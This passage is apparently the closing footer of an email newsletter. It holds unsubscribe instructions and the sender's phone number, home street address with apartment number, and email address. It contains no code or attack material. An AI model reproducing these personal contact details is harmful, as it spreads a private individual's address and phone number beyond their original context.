currently subscribed to Lawrence Auster's Newletter. If you wish to unsubscribe from our mailing list, please let us know by calling to 1 212 865 1284 Thanks, Lawrence Auster, 238 W 101 St Apt. 3B New York, NY 10025 Contact : lawrence.auster@att.net -------------------------------------